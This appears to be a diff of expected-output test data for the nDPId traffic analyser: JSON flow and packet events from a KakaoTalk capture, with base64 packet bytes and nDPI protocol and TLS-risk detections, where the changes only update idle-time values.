+00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":46,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069164656,"flow_last_seen":1430069164656,"flow_idle_time":7560000,"flow_min_l4_payload_len":442,"flow_max_l4_payload_len":442,"flow_tot_l4_payload_len":442,"flow_avg_l4_payload_len":442,"midstream":1,"thread_ts_msec":1430069164656,"l3_proto":"ip4","src_ip":"139.150.0.125","dst_ip":"10.24.82.188","src_port":443,"dst_port":46947,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +01060{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1430069164656,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":498,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":498,"pkt_l4_len":462,"thread_ts_msec":1430069164656,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAAeIKLkAAjgb4AIuWAH0KGFK8Abu3Y2Ij1H9RKASKUBifhj2IAAC2AQAA7+nGaLVdqRc+Gkt7POZ3izYarM8cfC\/oKc57w3ON8GY\/K1szNYS+6Yytrgv9fJ110+svPWy4JXfqhqsy8n\/Qi0EhBo8vKa7TtIo39CMQrfI1DyAke3OCHinKUbcE7JofE08wNW\/SYiLVq+ch1jInTJlBtTETD6sakW5t+\/pqslJuJu6FErHiOcJlRXUhJ\/w2UMRtIuPzDgq66Pu7iQ4cPuLk01HGBYGyY\/ec8L+8kz8C0iE6HOIH6YT0BKGthN3UTgwPbBq6O4DQcUiN2hgrUDIxq8uw9ZbWllzKNEYrEa8k7r3ZVHoPDQdXWrcQvhxam6oeYyK7V8McoNRiSIayjOQMTgXnysBnscEyik7me1vByK2C0l2He7bBFWQmrSmeZXMFh2H60fcsxZbAlEWK0siSqlB7jvAlTaG4udBSGXSTj4rEL2MZLSGqP2XF68ncz4+WzMi\/pNklQw9YyvrinQJFb3QOjkMePALF9ilvEQ+wMia1\/U8MBwJo9G9KKjVSCXjRCZRheUcgsdenusXElIUwOqnMT+7rwPfeomV3b9fbsOdbRa7VkQEi4icvvEwgda+Sg6Qy"} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1430069164657,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069164657,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAACjTg0AAQAZ+ZQoYUryLlgB9t2MBu1EoBIpiI9Y5UBCiGOkBAAA="} +00517{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1430069164839,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":98,"pkt_l4_len":62,"thread_ts_msec":1430069164839,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAFLThEAAQAZ+OgoYUryLlgB9t2MBu1EoBIpiI9Y5UBiiGP3wAAAmAAAA7+nGaLVdqRc+Gkt7POZ3izYaHM4cfJ\/pKc5wznSY7XhZjDJkzsc="} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":53,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069164966,"flow_last_seen":1430069164966,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1430069164966,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"110.76.143.50","src_port":58857,"dst_port":9001,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 
+00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":53,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1430069164966,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069164966,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADxKlUAAQAaV1AoYUrxuTI8y5ekjKS1pjaoAAAAAoAI2sFqBAAACBAV4BAIICgACxz8AAAAAAQMDBQ=="} +00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":54,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1430069165114,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069165114,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAADwAAEAALgbyaW5MjzIKGFK8Iynl6dfwna4taY2roBI4kADPAAACBAV4BAIICkTbbpQAAsc\/AQMDCQ=="} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1430069165115,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1430069165115,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADRKlkAAQAaV2woYUrxuTI8y5ekjKS1pjavX8J2vgBABtlp5AAABAQgKAALHTkTbbpQ="} 
+01065{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":56,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069164966,"flow_last_seen":1430069165129,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1430069165129,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"110.76.143.50","src_port":58857,"dst_port":9001,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"4b79ae67eb3b2cf1c75e68ea0100ca1b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01519{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":58,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1430069164966,"flow_last_seen":1430069165314,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":852,"flow_tot_l4_payload_len":994,"flow_avg_l4_payload_len":165,"midstream":0,"thread_ts_msec":1430069165314,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"110.76.143.50","src_port":58857,"dst_port":9001,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"6": {"risk":"Self-signed Certificate","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": 
{"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.KakaoTalk","breed":"Acceptable","category":"Chat"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"4b79ae67eb3b2cf1c75e68ea0100ca1b","ja3s":"4ea82b75038dd27e8a1cb69d8b839b26","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=KR, L=Seoul, O=Kakao, CN=Kakao.com","subjectDN":"C=KR, L=Seoul, O=Kakao, CN=Kakao.com","fingerprint":"65:88:37:51:01:AA:1F:12:E4:44:27:52:F9:32:FD:40:94:C1:08:D9"}} +00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":65,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069170090,"flow_last_seen":1430069170090,"flow_idle_time":7560000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":96,"midstream":1,"thread_ts_msec":1430069170090,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.194.72.188","src_port":34686,"dst_port":5228,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00607{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":65,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1430069170090,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":164,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":164,"pkt_l4_len":128,"thread_ts_msec":1430069170090,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAJSUaEAAQAZSqQoYUrytwki8h34UbGWkOWcyCtXvgBgB1zgmAAABAQgKAALJQHWhBxYXAwEAW9BJTUK7bhQDJS6M4k2xveYn3KZ2THpi3b2p1WnyM44nZ0651+YzJehbLb+jV4nNEd4GZbKLQU+P8abQYninXFhPSKcNuFppnDwsImxNyj3HrOvurwOWRZpYp3o="} 
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":75,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069170892,"flow_last_seen":1430069170892,"flow_idle_time":180000,"flow_min_l4_payload_len":78,"flow_max_l4_payload_len":78,"flow_tot_l4_payload_len":78,"flow_avg_l4_payload_len":78,"midstream":0,"thread_ts_msec":1430069170892,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"1.201.1.174","src_port":11321,"dst_port":23045,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3} 00551{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":75,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1430069170892,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":122,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":122,"pkt_l4_len":86,"thread_ts_msec":1430069170892,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAGoAAEAAPxHbOAoYUrwByQGuLDlaBQBWgNSByQAHC4ZVGZBlh61hMGy+mVz7szeLE04wAIGpUs16HTnaFQo\/DwShnbgrVUo6QPfO7hnIEQI6Zble8vC3moejgAAAAXwPCk3m1v5lftk="} 00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":75,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069170892,"flow_last_seen":1430069170892,"flow_idle_time":180000,"flow_min_l4_payload_len":78,"flow_max_l4_payload_len":78,"flow_tot_l4_payload_len":78,"flow_avg_l4_payload_len":78,"midstream":0,"thread_ts_msec":1430069170892,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"1.201.1.174","src_port":11321,"dst_port":23045,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"KakaoTalk_Voice","breed":"Acceptable","category":"VoIP"}} 
@@ -58,61 +58,61 @@ 00583{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":130,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1430069171998,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":142,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":142,"pkt_l4_len":106,"thread_ts_msec":1430069171998,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAH4AAEAAPxHbJAoYUrwByQGuLDlaBQBqX6qByAAMC4ZVGUMDyNdZMqzZvFL5masXDZVA6JQCTSwYzII6r0J+H6ebHDpiG6\/AGpupgF2zzgl2ppSiLVPnYiD98U8UjOQ2fRfyw\/ugiovyQFT+lfaAAAACkQQ8eHVaWMSL\/A=="} 00581{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":134,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1430069172038,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":142,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":142,"pkt_l4_len":106,"thread_ts_msec":1430069172038,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAH4AAEAAQBHaJAoYUrwByQGuKB1aBwBqXmKByAAMVJql2trT+4JMtrXIu\/DNYLUyrcCH4nJIkwVlTlKbwLjRHdwKTf1t+cEG2dNtu5tj5fpNWxpJ1GyPSnYq1Tkhei6L7QH9KpD9dMR2BEbVSkSAAAACiCDm5WucO1eQLg=="} 00585{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":141,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1430069172127,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":142,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":142,"pkt_l4_len":106,"thread_ts_msec":1430069172127,"pkt":"AAACEgAAAAAAAAAAAAAIAEUoAH4AAEAAGhH\/\/AHJAa4KGFK8WgcoHQBqY8SByAAMC4ZVGUMDyNdZMqzZvFL5masXDZVA6JQCTSwYzII6r0J+H6ebHDpiG6\/AGpupgF2zzgl2ppSiLVPnYiD98U8UjOQ2fRfyw\/ugiovyQFT+lfaAAAACkQQ8eHVaWMSL\/A=="} 
-00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":691,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069180329,"flow_last_seen":1430069180329,"flow_idle_time":7440000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":1,"thread_ts_msec":1430069180329,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"216.58.220.174","src_port":49217,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":691,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1430069180329,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":83,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":83,"pkt_l4_len":47,"thread_ts_msec":1430069180329,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAENCkkAAQAbmZQoYUrzYOtyuwEEBuxTXAEVlWZivUBiMAAFrAAAVAwEAFnnuS9reX0mqADPiihp3NglZFsDnKQA="} -00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1470,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069193291,"flow_last_seen":1430069193291,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069193291,"l3_proto":"ip4","src_ip":"173.252.122.1","dst_ip":"10.24.82.188","src_port":443,"dst_port":52123,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 
-00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1470,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1430069193291,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069193291,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACg66EAAjgYtFq38egEKGFK8AbvLm\/Ii35zxwsMTUBSkcjKfAAA="} -00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2099,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069201833,"flow_last_seen":1430069201833,"flow_idle_time":7440000,"flow_min_l4_payload_len":2,"flow_max_l4_payload_len":2,"flow_tot_l4_payload_len":2,"flow_avg_l4_payload_len":2,"midstream":1,"thread_ts_msec":1430069201833,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"203.205.151.233","src_port":53974,"dst_port":8080,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2099,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1430069201833,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":70,"pkt_l4_len":34,"thread_ts_msec":1430069201833,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADZOw0AAQAYrdAoYUrzLzZfp0tYfkMl8NsazTa2QgBgBtk1IAAABAQgKAALVpswmIb5QFA=="} 
-00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2182,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1430069202570,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":70,"pkt_l4_len":34,"thread_ts_msec":1430069202570,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADZOxEAAQAYrcwoYUrzLzZfp0tYfkMl8NsazTa2QgBgBtkz+AAABAQgKAALV8MwmIb5QFA=="} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2278,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1430069204049,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":70,"pkt_l4_len":34,"thread_ts_msec":1430069204049,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADZOxUAAQAYrcgoYUrzLzZfp0tYfkMl8NsazTa2QgBgBtkxqAAABAQgKAALWhMwmIb5QFA=="} -00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2798,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069210863,"flow_last_seen":1430069210863,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069210863,"l3_proto":"ip4","src_ip":"173.194.117.229","dst_ip":"10.24.82.188","src_port":443,"dst_port":38380,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 
-00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2798,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1430069210863,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069210863,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACih+UAAjgbKWq3CdeUKGFK8AbuV7IoFQj5TpMuVUBSklweYAAA="} -00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2838,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069211505,"flow_last_seen":1430069211505,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069211505,"l3_proto":"ip4","src_ip":"173.252.88.128","dst_ip":"10.24.82.188","src_port":443,"dst_port":59912,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2838,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1430069211505,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069211505,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAAChd+0AA+AbBg638WIAKGFK8AbvqCPsyGz7Wm7gkUBQAALuKAAA="} 
-00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2839,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1430069211505,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1430069211505,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAADTK\/EAAjga+dq38WIAKGFK8AbvqCPsyGz7Wm7gkgBQClSKzAAABAQgKopRXsAACYuQ="} -00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2851,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069211639,"flow_last_seen":1430069211639,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1430069211639,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.88.128","src_port":59954,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2851,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1430069211639,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069211639,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADxoAkAAQAZvaQoYUryt\/FiA6jIBuzJ1sXgAAAAAoAI2sGN\/AAACBAV4BAIICgAC2XoAAAAAAQMDBQ=="} 
+00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":691,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069180329,"flow_last_seen":1430069180329,"flow_idle_time":7560000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":1,"thread_ts_msec":1430069180329,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"216.58.220.174","src_port":49217,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":691,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1430069180329,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":83,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":83,"pkt_l4_len":47,"thread_ts_msec":1430069180329,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAENCkkAAQAbmZQoYUrzYOtyuwEEBuxTXAEVlWZivUBiMAAFrAAAVAwEAFnnuS9reX0mqADPiihp3NglZFsDnKQA="} +00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1470,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069193291,"flow_last_seen":1430069193291,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069193291,"l3_proto":"ip4","src_ip":"173.252.122.1","dst_ip":"10.24.82.188","src_port":443,"dst_port":52123,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 
+00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1470,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1430069193291,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069193291,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACg66EAAjgYtFq38egEKGFK8AbvLm\/Ii35zxwsMTUBSkcjKfAAA="} +00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2099,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069201833,"flow_last_seen":1430069201833,"flow_idle_time":7560000,"flow_min_l4_payload_len":2,"flow_max_l4_payload_len":2,"flow_tot_l4_payload_len":2,"flow_avg_l4_payload_len":2,"midstream":1,"thread_ts_msec":1430069201833,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"203.205.151.233","src_port":53974,"dst_port":8080,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2099,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1430069201833,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":70,"pkt_l4_len":34,"thread_ts_msec":1430069201833,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADZOw0AAQAYrdAoYUrzLzZfp0tYfkMl8NsazTa2QgBgBtk1IAAABAQgKAALVpswmIb5QFA=="} 
+00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2182,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1430069202570,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":70,"pkt_l4_len":34,"thread_ts_msec":1430069202570,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADZOxEAAQAYrcwoYUrzLzZfp0tYfkMl8NsazTa2QgBgBtkz+AAABAQgKAALV8MwmIb5QFA=="} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2278,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1430069204049,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":70,"pkt_l4_len":34,"thread_ts_msec":1430069204049,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADZOxUAAQAYrcgoYUrzLzZfp0tYfkMl8NsazTa2QgBgBtkxqAAABAQgKAALWhMwmIb5QFA=="} 